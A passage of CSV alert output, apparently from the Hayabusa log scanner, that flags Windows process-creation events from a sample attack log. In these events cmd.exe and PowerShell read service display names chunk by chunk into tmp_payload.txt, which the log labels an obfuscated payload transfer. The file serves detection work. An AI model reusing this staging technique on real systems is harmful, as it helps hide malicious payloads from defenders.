/c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:54.287 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x28c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:00.089 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:00.104 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:01.557 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:03.010 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:03.026 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:04.458 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:05.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:05.911 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:07.342 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:08.797 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:10.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:11.689 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:13.147 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:14.607 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:14.623 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:16.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:16.080 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:17.549 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:17.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:19.048 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:20.564 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:35:22.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:22.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:23.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:23.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:24.966 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:24.966 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:26.426 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:26.426 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
